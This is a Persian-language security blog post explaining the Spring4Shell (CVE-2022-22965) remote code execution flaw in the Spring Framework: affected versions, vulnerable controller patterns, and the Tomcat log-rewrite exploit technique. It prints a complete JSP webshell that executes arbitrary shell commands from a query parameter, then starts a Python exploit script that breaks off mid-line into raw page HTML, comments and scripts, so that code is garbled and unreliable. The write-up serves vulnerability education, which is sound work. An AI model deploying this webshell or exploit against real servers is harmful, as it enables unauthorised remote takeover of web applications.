تحلیل و اکسپلویت آسیب پذیری Spring4Shell

یک آسیب‌پذیری جدید روز صفر اجرای کد از راه دور (RCE) به نام «Spring4Shell» یا «SpringShell» در  فریمورک Spring فاش شد. یک مهاجم غیرمجاز می تواند از این آسیب پذیری برای اجرای کد دلخواه از راه دور بر روی دستگاه مورد نظر سوء استفاده کند.

 

ما در این پست در مقاله به موارد کلیدی اشاره کردیم و راه حل هایی برای رفع این آسیب پذیری هم خدمت دوستان گفتیم

اگر مشتاق این هستید که بدونید این آسیب پذیری دقیقا چطور رخ داده و چطور میتوان اکسپلویت کرد ما به صورت تکنیکال و deep dive یک ویدیو درست کردیم که حتما پیشنهاد میکنم اول ویدیو را مشاهده کنید و بعد مقاله را مطالعه کنید 🙂

 

ویدیو تحلیل و اکسپلویت آسیب پذیری CVE-2022-22965 – SpringShell (Spring4Shell):

 

برای مشاهده ویدیو حتما vpn خود را روشن کنید و حتما کانال یوتوب ما رو هم دنبال کنید !

Spring Framework چیست؟

Spring-core یک فریمورک رایج است که به طور گسترده در برنامه های کاربردی جاوا استفاده می شود که به توسعه دهندگان نرم افزار اجازه می دهد تا برنامه های جاوا را با اجزای سطح سازمانی بدون زحمت توسعه دهند.

 

کدام نسخه ها آسیب پذیر هستند؟

این آسیب‌پذیری نیازمند اجرای JDK نسخه ۹ یا بالاتر است. Spring Framework نسخه های ۵٫۳٫۰ تا ۵٫۳٫۱۷، ۵٫۲٫۰ تا ۵٫۲٫۱۹ و نسخه های قدیمی تر آسیب پذیر هستند. این به مهاجمان راه دور اجازه می‌دهد هنگام اجرای برنامه‌های فریمورک Spring در بالای JRE 9، یک web shell درست کنند. این امر به دلیل غیر ایمن‌سازی آرگومان‌های داده شده است که یک درخواست HTTP  ساده می‌تواند باعث دسترسی کامل از راه دور شود. با ما همراه باشید تا به صورت دقیق تر علت ایجاد آسیب پذیری را توصیح دهیم 🙂

 

دقیقاً چه زمانی آسیب‌پذیری SpringShell (Spring4Shell) قابل بهره‌برداری است؟ :

  • برنامه وب شما بر اساس Spring Framework ساخته شده است (مثلاً با استفاده از Spring Boot)
  • برنامه وب شما روی JDK 9 یا  نسخه بالاتر اجرا می شود
  • برنامه وب شما از Data Binding برای اتصال پارامترهای درخواست به یک object جاوا استفاده می کند
  • برنامه شما در وب سرور Apache Tomcat باشد
  • بسته بندی شده به صورت فرمت WAR (Web Application Archive or Web Application Resource) ( که به صورت پیشفرض در این نوع بسته بندی است)

برنامه وب شما از Data Binding استفاده کند :

 از آنجایی که آسیب‌پذیری در مکانیسم data binding Spring است، فقط برنامه‌های کاربردی وب که سعی می‌کنند پارامترهای درخواست را به POJO (اشیاء ساده قدیمی جاوا) متصل کنند آسیب‌پذیر هستند. در عمل، این بدان معناست که کنترل کننده درخواست یک نوع کلاس تعریف شده توسط کاربر را به عنوان اولین آرگومان دریافت می کند.

هر یک از annotations های زیر، کنترل کننده درخواستی را نشان می دهد که ممکن است آسیب پذیر باشد 

				
					@RequestMapping
@GetMapping
@PostMapping
@PutMapping
@DeleteMapping
@PatchMapping
				
			

نمونه‌ای از یک Controller آسیب‌پذیر :

				
					@Controller
public class HelloController {
  @GetMapping("/greeting")
  public String helloWorld(@ModelAttribute SomeClass someClass, Model model) {
      return "hello";
  }
}
				
			

به annotation @ModelAttribute توجه کنید که نشان می دهد اتصال داده ها انجام خواهد شد.

همان کنترل کننده درخواست همچنین می تواند بدون annotation @ModelAttribute (برای آرگومان someClass) نوشته شود و همچنان آسیب پذیر باشد –

				
					@GetMapping("/greeting")
public String helloWorld(SomeClass someClass, Model model) {
    return "hello";
}
				
			

به عنوان مرجع، توجه داشته باشید که هنگام استفاده از انواع پارامترها / annotations های زیر، آسیب پذیری نمی تواند مورد سوء استفاده قرار گیرد –

				
					WebRequest
NativeWebRequest
ServletRequest
ServletResponse
MultipartRequest
MultipartHttpServletRequest
HttpSession
PushBuilder
Principal
HttpMethod
Locale
TimeZone
ZoneId
InputStream
Reader
OutputStream
Writer
@PathVariable
@MatrixVariable
@RequestParam
@RequestHeader
@CookieValue
@RequestBody
HttpEntity
@RequestPart
Map
Model
ModelMap
RedirectAttributes
SessionStatus
@SessionAttribute
@SessionAttributes
UriComponentsBuilder
@RequestAttribute
				
			

 

چرا CVE-2022-22965 – SpringShell (Spring4Shell) بسیار خطرناک است؟

Spring Framework یک فریمورک بسیار محبوب برای ساخت برنامه های کاربردی وب است و آسیب پذیری SpringShell در قلب این فریم ورک نهفته است، به این معنی که بسیاری از برنامه های وب که با استفاده از Spring Framework ساخته می شوند، مستعد این مشکل خواهند بود.

اگرچه آسیب‌پذیری امنیتی برای همه برنامه‌های کاربردی وب قابل بهره‌برداری نیست (پیشنیاز هایی برای بهره برداری از این آسیب پذیری نیاز است که در بخش قبلی گفتیم)، پیش نیازهای بهره‌برداری ممکن است بسیار نادر نباشد. به عنوان مثال، یکی از آموزش‌های اساسی منتشر شده توسط Spring – “Handling Form Submission” در معرض این آسیب‌پذیری است. با توجه به این واقعیت که بسیاری از توسعه دهندگان برنامه های وب از این آموزش ها به عنوان الگو استفاده می کنند، این می تواند منجر به آسیب پذیری برنامه های کاربردی در طبیعت شود.

تاثیر این آسیب پذیری بالاترین حد ممکن است – اجرای کد از راه دور.

علاوه بر این، هیچ تکنیک کاهشی در خود JDK در برابر این نوع آسیب‌پذیری وجود ندارد، و این آسیب‌پذیری برای بهره‌برداری به شیوه‌ای پایدار بی‌اهمیت است.

با وجود تمام موارد فوق، ما باور نداریم که این مشکل به اندازه Log4Shell گسترده باشد.

 

SpringShell (Spring4Shell) در حال حاضر چگونه مورد بهره برداری قرار می گیرد؟

راه‌های زیادی برای بهره‌برداری از ClassLoader به منظور به دست آوردن اجرای کد از راه دور وجود دارد، اما اکسپلویت اصلی PoC منتشر شده، این آسیب‌پذیری امنیتی را با تکنیکی خاص Tomcat سواستفاده می‌کند – از AccessLogValve برای به دست آوردن بازنویسی فایل دلخواه استفاده می‌کند.

اکسپلویت در ۲ مرحله کار می کند –

  • نادیده گرفتن ویژگی های ClassLoader مخصوص Tomcat، برای تغییر مسیر فایل لاگ دسترسی به جایی در زیر فهرست اصلی وب، و تغییر الگوی گزارش (داده های نوشته شده) به یک الگوی ثابت که حاوی کد webshell است. این باعث می شود که JSP webshell در فهرست اصلی وب حذف شود
  • ارسال یک درخواستquery به وب شل درست شده توسط مهاجم، برای اجرای یک فرمان شل دلخواه

webshell یک برنامه JSP بسیار ساده است که دستورات شل ارسال شده به آن را از طریق پارامترهای پquery اجرا می کند.

				
					<%
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
 
while((a=in.read(b))!=-1) {
    out.println(new String(b));
}
%>
				
			

 

چگونه می توانم برای آسیب پذیری SpringShell (Spring4Shell) تست کنم؟

برای آزمایش باید بر روی endpoints زنده، میتوانید از طریق کد exploit پایتون زیر آسیب پذیری را تست کنید

  import requests import argparse from urllib.parse import urljoin def exploit(url, filename, password, directory): headers = {"suffix":"%><div class="comment-holder"><h2 class="comment-title">1 دیدگاه</h2><p class="comment-subtitle">به گفتگوی ما بپیوندید و دیدگاه خود را با ما در میان بگذارید.</p><ul class="commentlist clearfix"><li id="comment-2798" class="comment even thread-even depth-1"><article id="div-comment-2798" class="comment-body"><footer class="comment-meta"><div class="comment-author vcard"> <img alt='' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2080'%3E%3C/svg%3E" data-lazy-srcset='https://vipsecurity.zone/wp-content/uploads/2021/09/user-avatar-518378-300x300.png 2x' class='avatar avatar-80 photo' height='80' width='80' data-lazy-src="//vipsecurity.zone/wp-content/uploads/2021/09/user-avatar-518378-100x100.png" /><noscript><img alt='' src='//vipsecurity.zone/wp-content/uploads/2021/09/user-avatar-518378-100x100.png' srcset='https://vipsecurity.zone/wp-content/uploads/2021/09/user-avatar-518378-300x300.png 2x' class='avatar avatar-80 photo' height='80' width='80' /></noscript> <b class="fn">MatthewReors</b> <span class="says">گفت:</span></div><div class="comment-metadata"> <a href="https://vipsecurity.zone/spring4shell-analysis-and-exploit/#comment-2798"><time datetime="1401/2/14 13:46:37">14 اردیبهشت 1401 در 1:46 ب.ظ</time></a></div></footer><div class="comment-content"><p>خیلی ممنون بابت توضیحات جامع تون</p></div><div class="reply"><a rel='nofollow' class='comment-reply-link' href='#comment-2798' data-commentid="2798" data-postid="5553" data-belowelement="div-comment-2798" data-respondelement="respond" data-replyto="پاسخ به MatthewReors" aria-label='پاسخ به MatthewReors'>پاسخ</a></div></article></li></ul></div><div id="respond" class="comment-respond"><h3 id="reply-title" class="comment-reply-title">دیدگاهتان را بنویسید <small><a rel="nofollow" id="cancel-comment-reply-link" href="/spring4shell-analysis-and-exploit/#respond" style="display:none;">لغو پاسخ</a></small></h3><form action="//vipsecurity.zone/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-form-comment"><label for="comment">دیدگاه <span class="required" aria-hidden="true">*</span></label><textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required></textarea></p><p class="comment-form-author"><label for="author">نام <span class="required" aria-hidden="true">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required /></p><p class="comment-form-email"><label for="email">ایمیل <span class="required" aria-hidden="true">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" required /></p><p class="comment-form-url"><label for="url">وب‌ سایت</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p><p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">ذخیره نام، ایمیل و وبسایت من در مرورگر برای زمانی که دوباره دیدگاهی می‌نویسم.</label></p><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="فرستادن دیدگاه" /> <input type='hidden' name='comment_post_ID' value='5553' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /></p></form></div></div></div></div></div><footer class="herowp-page-footer"><div data-elementor-type="wp-post" data-elementor-id="4131" class="elementor elementor-4131"><div class="elementor-inner"><div class="elementor-section-wrap"><section class="elementor-section elementor-top-section elementor-element elementor-element-1bcca3de elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="1bcca3de" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5682f079" data-id="5682f079" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><section class="elementor-section elementor-inner-section elementor-element elementor-element-5f8ca0d4 el-main-footer elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5f8ca0d4" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-36d604f8" data-id="36d604f8" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-747428ae elementor-widget elementor-widget-heading" data-id="747428ae" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h5 class="elementor-heading-title elementor-size-default">درباره Vip Security</h5></div></div><div class="elementor-element elementor-element-1c1950d2 elementor-widget elementor-widget-text-editor" data-id="1c1950d2" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><div class="elementor-text-editor elementor-clearfix"><p>تیم Vip Security یا همان امنیت ویژه فعالیت رسمی خود را از سال ۲۰۲۰ شروع کرده است و یک پلتفرم آموزش تخصصی تست نفوذ به زبان فارسی برای تمامی فارسی زبانان است</p></div></div></div><div class="elementor-element elementor-element-5f050adb elementor-icon-list--layout-inline elementor-align-right elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="5f050adb" data-element_type="widget" data-widget_type="icon-list.default"><div class="elementor-widget-container"><ul class="elementor-icon-list-items elementor-inline-items"><li class="elementor-icon-list-item elementor-inline-item"> <a href="https://instagram.com/vipsecurity.zone"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="fab fa-instagram"></i> </span> <span class="elementor-icon-list-text"></span> </a></li><li class="elementor-icon-list-item elementor-inline-item"> <a href="https://www.youtube.com/channel/UCV9jbDCxVqEterQZOTbn5Hg"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="fab fa-youtube"></i> </span> <span class="elementor-icon-list-text"></span> </a></li><li class="elementor-icon-list-item elementor-inline-item"> <a href="https://t.me/Vip_Security"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="fab fa-telegram-plane"></i> </span> <span class="elementor-icon-list-text"></span> </a></li></ul></div></div></div></div></div><div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-1ae6b919" data-id="1ae6b919" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-106b223f elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="106b223f" data-element_type="widget" data-widget_type="icon-list.default"><div class="elementor-widget-container"><ul class="elementor-icon-list-items"><li class="elementor-icon-list-item"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="fas fa-phone"></i> </span> <span class="elementor-icon-list-text">تماس: ۰۹۰۱۲۳۷۲۲۱۲</span></li><li class="elementor-icon-list-item"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="far fa-envelope"></i> </span> <span class="elementor-icon-list-text">ایمیل: info@vipsecurity.zone </span></li></ul></div></div></div></div></div></div></div></section></div></div></div></div></div></section><section class="elementor-section elementor-top-section elementor-element elementor-element-57dc3c elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="57dc3c" data-element_type="section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;,&quot;background_background&quot;:&quot;classic&quot;,&quot;shape_divider_top&quot;:&quot;curve&quot;}"><div class="elementor-shape elementor-shape-top" data-negative="false"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 100" preserveAspectRatio="none"> <path class="elementor-shape-fill" d="M1000,4.3V0H0v4.3C0.9,23.1,126.7,99.2,500,100S1000,22.7,1000,4.3z"/> </svg></div><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-71f30a1b" data-id="71f30a1b" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-ca3b67c elementor-widget elementor-widget-footer_menu" data-id="ca3b67c" data-element_type="widget" data-widget_type="footer_menu.default"><div class="elementor-widget-container"><div class="footer-menu"><h5 class="title">مطالب پر بازدید</h5><ul><li> <a href="https://vipsecurity.zone/%d8%a7%d8%b3%d8%aa%d9%81%d8%a7%d8%af%d9%87-%d8%a7%d8%b2-%d8%aa%d8%b1%d9%85%db%8c%d9%86%d8%a7%d9%84-%d9%84%db%8c%d9%86%d9%88%da%a9%d8%b3-%d8%af%d8%b1-%d9%88%db%8c%d9%86%d8%af%d9%88%d8%b2/"> ترمینال لینوکس برای ویندوز </a></li><li> <a href="https://vipsecurity.zone/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a7%d8%b5%d8%b7%d9%84%d8%a7%d8%ad%d8%a7%d8%aa-%d9%87%da%a9%d8%b1%db%8c-%d9%82%d8%b3%d9%85%d8%aa%db%b1/"> اصطلاحات هکری </a></li><li> <a href="https://vipsecurity.zone/?s=%D8%B3%D8%A7%D8%AE%D8%AA+%D8%B1%D8%AA"> ساخت رت </a></li><li> <a href="https://vipsecurity.zone/8-%da%a9%d8%aa%d8%a7%d8%a8%d8%ae%d8%a7%d9%86%d9%87-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%b1%d8%a7%db%8c-%d8%aa%d8%b3%d8%aa-%d9%86%d9%81%d9%88%d8%b0/"> کتابخانه های پایتون برای هک </a></li><li> <a href="https://vipsecurity.zone/%d9%87%d8%a7%d9%86%db%8c-%d9%be%d8%a7%d8%aa-%da%86%db%8c%d8%b3%d8%aa%d8%9f-%d8%a7%d9%86%d9%88%d8%a7%d8%b9-%d9%87%d8%a7%d9%86%db%8c-%d9%be%d8%a7%d8%aa/"> هانی پات چیست </a></li><li> <a href="https://vipsecurity.zone/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%b3%d8%a7%d8%ae%d8%aa-%da%a9%db%8c%d9%84%d8%a7%da%af%d8%b1-%d8%a8%d8%a7-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86/"> ساخت کیلاگر با پایتون </a></li></ul></div></div></div></div></div></div><div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-6eec11f6" data-id="6eec11f6" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-642a187 elementor-widget elementor-widget-text-editor" data-id="642a187" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><div class="elementor-text-editor elementor-clearfix"><p>آموزش تخصصی تست نفوذ در VipSecurity اگر دنبال مطلبی هستی میتونی اینجا جستجو کنی</p></div></div></div><div class="elementor-element elementor-element-1239ac0 elementor-search-form--button-type-text elementor-search-form--skin-classic elementor-widget elementor-widget-search-form" data-id="1239ac0" data-element_type="widget" data-settings="{&quot;skin&quot;:&quot;classic&quot;}" data-widget_type="search-form.default"><div class="elementor-widget-container"><form class="elementor-search-form" role="search" action="//vipsecurity.zone" method="get"><div class="elementor-search-form__container"> <input placeholder="جستجو کردن..." class="elementor-search-form__input" type="search" name="s" title="جستجو کردن" value=""> <button class="elementor-search-form__submit" type="submit" title="جستجو کردن" aria-label="جستجو کردن"> جستجو کردن </button></div></form></div></div></div></div></div></div></div></section></div></div></div></footer> <a id="back-to-top" class="back-to-top"> <i class="fal fa-chevron-up"></i> </a>  <svg class="shape-overlays" viewBox="0 0 100 100" preserveAspectRatio="none"><defs><linearGradient id="search-overlay-color-1" x1="0%" y1="0%" x2="100%" y2="0%"><stop offset="0%" stop-color="#000000"/><stop offset="100%" stop-color="#1e272e"/></linearGradient><linearGradient id="search-overlay-color-2" x1="0%" y1="0%" x2="100%" y2="0%"><stop offset="0%" stop-color="#808e9b"/><stop offset="100%" stop-color="#808e9b"/></linearGradient><linearGradient id="search-overlay-color-3" x1="0%" y1="0%" x2="100%" y2="0%"><stop offset="0%" stop-color="#8395a7"/><stop offset="100%" stop-color="#576574"/></linearGradient><linearGradient id="search-overlay-color-4" x1="0%" y1="0%" x2="100%" y2="0%"><stop offset="0%" stop-color="#7d8dff"/><stop offset="100%" stop-color="#ff4f81"/></linearGradient></defs><path class="shape-overlays__path" d="" fill="url(#search-overlay-color-3)"></path><path class="shape-overlays__path" d="" fill="url(#search-overlay-color-2)"></path><path class="shape-overlays__path" d="" fill="url(#search-overlay-color-1)"></path></svg><div class="emperor-overlay"><div class="emperor-search "><div class="container"><div class="emperor-overlay-item emperor-overlay-item--style-6"> <a href="#" class="emperor-search-close"><i class="fal fa-times-circle"></i></a><div class="pb-0"><div class="search-title h1 heading-font display-2 text-gradient-primary2 text-white font-weight-bold">جستجو</div></div></div><div class="slide-in-container pb-2 emperor-overlay-item emperor-overlay-item--style-6"><p class="text-gray-3s text-20 mb-2 secondary-font search-note">جستجو با زدن Enter و بستن با زدن ESC</p></div><div class="search-bar emperor-overlay-item emperor-overlay-item--style-6"><div class="search-content"><form class="emperor-search-form" method="get" action="//vipsecurity.zone/"><div class="media emperor-ajax-search-container"> <button class="emperor-search-submit align-self-center" aria-label="search" type="submit"><i class="fal fa-search"></i></button><div class="media-body"> <input value="" name="s" id="s" class="emperor-search-input emperor-ajax-search" type="search" autocomplete="off" placeholder="دنبال چی میگردی؟"/></div></div></form></div></div></div></div></div>     <script type='text/javascript' id='jquery-yith-wcwl-js-extra'>/* <![CDATA[ */ var yith_wcwl_l10n = {"ajax_url":"\/wp-admin\/admin-ajax.php","redirect_to_cart":"no","multi_wishlist":"","hide_add_button":"1","enable_ajax_loading":"","ajax_loader_url":"https:\/\/vipsecurity.zone\/wp-content\/plugins\/yith-woocommerce-wishlist\/assets\/images\/ajax-loader-alt.svg","remove_from_wishlist_after_add_to_cart":"1","is_wishlist_responsive":"1","time_to_close_prettyphoto":"3000","fragments_index_glue":".","reload_on_found_variation":"1","mobile_media_query":"768","labels":{"cookie_disabled":"\u0645\u062a\u0627\u0633\u0641\u06cc\u0645\u060c \u0644\u06cc\u0633\u062a \u0639\u0644\u0627\u0642\u0647 \u0645\u0646\u062f\u06cc \u0632\u0645\u0627\u0646\u06cc \u0622\u0645\u0627\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0634\u0645\u0627 \u06a9\u0648\u06a9\u06cc \u0645\u0631\u0648\u06af\u0631\u062a\u0648\u0646 \u0631\u0627 \u0641\u0639\u0627\u0644 \u06a9\u0631\u062f\u0647 \u0628\u0627\u0634\u06cc\u062f.","added_to_cart_message":"<div class=\"woocommerce-notices-wrapper\"><div class=\"woocommerce-message\" role=\"alert\">\u0645\u062d\u0635\u0648\u0644\u0627\u062a \u0628\u0627 \u0645\u0648\u0641\u0642\u06cc\u062a \u0628\u0647 \u0633\u0628\u062f \u062e\u0631\u06cc\u062f\u062a\u0627\u0646 \u0627\u0636\u0627\u0641\u0647 \u0634\u062f\u0646\u062f<\/div><\/div>"},"actions":{"add_to_wishlist_action":"add_to_wishlist","remove_from_wishlist_action":"remove_from_wishlist","reload_wishlist_and_adding_elem_action":"reload_wishlist_and_adding_elem","load_mobile_action":"load_mobile","delete_item_action":"delete_item","save_title_action":"save_title","save_privacy_action":"save_privacy","load_fragments":"load_fragments"},"nonce":{"add_to_wishlist_nonce":"325ab0129d","remove_from_wishlist_nonce":"af421c7330","reload_wishlist_and_adding_elem_nonce":"c738e928f0","load_mobile_nonce":"d839230c9e","delete_item_nonce":"687975c530","save_title_nonce":"bb7da932cb","save_privacy_nonce":"aa610027a6","load_fragments_nonce":"c3f962627f"}}; /* ]]> */</script>   <script type='text/javascript' id='wc-add-to-cart-js-extra'>/* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"\u0645\u0634\u0627\u0647\u062f\u0647 \u0633\u0628\u062f \u062e\u0631\u06cc\u062f","cart_url":"https:\/\/vipsecurity.zone\/cart\/","is_cart":"","cart_redirect_after_add":"yes"}; /* ]]> */</script>   <script type='text/javascript' id='woocommerce-js-extra'>/* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */</script>  <script type='text/javascript' id='wc-cart-fragments-js-extra'>/* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_165c47a87133939b1312026da124bd2f","fragment_name":"wc_fragments_165c47a87133939b1312026da124bd2f","request_timeout":"5000"}; /* ]]> */</script>  <script type='text/javascript' id='ppress-frontend-script-js-extra'>/* <![CDATA[ */ var pp_ajax_form = {"ajaxurl":"https:\/\/vipsecurity.zone\/wp-admin\/admin-ajax.php","confirm_delete":"Are you sure?","deleting_text":"Deleting...","deleting_error":"An error occurred. Please try again.","nonce":"1e46a789c1","disable_ajax_form":"false"}; /* ]]> */</script>  <script type='text/javascript' id='herowp-theme-js-extra'>/* <![CDATA[ */ var herowp_options = {"countdown_days":"\u0631\u0648\u0632","countdown_hours":"\u0633\u0627\u0639\u062a","countdown_mins":"\u062f\u0642\u06cc\u0642\u0647","countdown_sec":"\u062b\u0627\u0646\u06cc\u0647"}; /* ]]> */</script>                   <script type='text/javascript' id='elementor-pro-frontend-js-before'>var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/vipsecurity.zone\/wp-admin\/admin-ajax.php","nonce":"4861e4fcf9","urls":{"assets":"https:\/\/vipsecurity.zone\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/vipsecurity.zone\/wp-json\/"},"shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"mix":{"title":"Mix"},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"}},"woocommerce":{"menu_cart":{"cart_page_url":"https:\/\/vipsecurity.zone\/cart\/","checkout_page_url":"https:\/\/vipsecurity.zone\/checkout\/"}},"facebook_sdk":{"lang":"fa_IR","app_id":""},"lottie":{"defaultAnimationUrl":"https:\/\/vipsecurity.zone\/wp-content\/plugins\/elementor-pro\/modules\/lottie\/assets\/animations\/default.json"}};</script>       <script type='text/javascript' id='elementor-frontend-js-before'>var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"\u0627\u0634\u062a\u0631\u0627\u06a9 \u06af\u0630\u0627\u0631\u06cc \u062f\u0631 \u0641\u06cc\u0633 \u0628\u0648\u06a9","shareOnTwitter":"\u0627\u0634\u062a\u0631\u0627\u06a9 \u06af\u0630\u0627\u0631\u06cc \u062f\u0631 \u062a\u0648\u06cc\u062a\u0631","pinIt":"\u0633\u0646\u062c\u0627\u0642 \u06a9\u0631\u062f\u0646","download":"\u062f\u0627\u0646\u0644\u0648\u062f","downloadImage":"\u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u062a\u0635\u0648\u06cc\u0631","fullscreen":"\u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647","zoom":"\u0628\u0632\u0631\u06af\u0646\u0645\u0627\u06cc\u06cc","share":"\u0627\u0634\u062a\u0631\u0627\u06a9 \u06af\u0630\u0627\u0631\u06cc","playVideo":"\u067e\u062e\u0634 \u0648\u06cc\u062f\u06cc\u0648","previous":"\u0642\u0628\u0644\u06cc","next":"\u0628\u0639\u062f\u06cc","close":"\u0628\u0633\u062a\u0646"},"is_rtl":true,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":100000000,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"\u0645\u0648\u0628\u0627\u06cc\u0644","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"\u062a\u0644\u0641\u0646 \u0647\u0645\u0631\u0627\u0647 \u0628\u0632\u0631\u06af","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"\u062a\u0628\u0644\u062a","value":99999999,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"\u062a\u0628\u0644\u062a \u0628\u0632\u0631\u06af","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"\u0644\u067e \u062a\u0627\u067e","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"\u0635\u0641\u062d\u0647 \u0639\u0631\u06cc\u0636","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.6.5","is_static":false,"experimentalFeatures":{"e_import_export":true,"e_hidden_wordpress_widgets":true,"theme_builder_v2":true,"landing-pages":true,"elements-color-picker":true,"favorite-widgets":true,"admin-top-bar":true,"page-transitions":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"https:\/\/vipsecurity.zone\/wp-content\/plugins\/elementor\/assets\/"},"settings":{"page":[],"editorPreferences":[]},"kit":{"viewport_tablet":99999999,"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","woocommerce_notices_elements":[]},"post":{"id":5553,"title":"%D8%AA%D8%AD%D9%84%DB%8C%D9%84%20%D9%88%20%D8%A7%DA%A9%D8%B3%D9%BE%D9%84%D9%88%DB%8C%D8%AA%20%D8%A2%D8%B3%DB%8C%D8%A8%20%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C%20Spring4Shell%20-%20Vip%20Security","excerpt":"","featuredImage":"https:\/\/vipsecurity.zone\/wp-content\/uploads\/2022\/04\/spring4shell-scaled.jpg"}};</script>      <script type='text/javascript' id='wp-util-js-extra'>/* <![CDATA[ */ var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}}; /* ]]> */</script>  <script type='text/javascript' id='wpforms-elementor-js-extra'>/* <![CDATA[ */ var wpformsElementorVars = {"captcha_provider":"recaptcha","recaptcha_type":"v2"}; /* ]]> */</script>  <script>window.lazyLoadOptions={elements_selector:"img[data-lazy-src],.rocket-lazyload,iframe[data-lazy-src]",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,callback_loaded:function(element){if(element.tagName==="IFRAME"&&element.dataset.rocketLazyload=="fitvidscompatible"){if(element.classList.contains("lazyloaded")){if(typeof 